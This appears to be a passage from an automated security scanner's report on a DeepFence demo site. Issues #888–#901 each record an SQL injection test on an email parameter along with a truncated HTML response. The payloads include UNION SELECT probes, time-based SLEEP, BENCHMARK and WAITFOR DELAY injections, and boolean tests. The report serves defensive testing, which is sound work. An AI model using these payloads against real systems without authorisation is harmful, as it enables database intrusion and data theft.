href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #888Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #889\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'\\\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #890\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #891\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #892\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #893\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #894\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #895\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ' AND MID(VERSION(),1,1) = '5';\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #896\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #897\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AS INJECTX WHERE 1=1 AND 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #898\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 1=1 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #899Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #900\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \"));waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #901\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 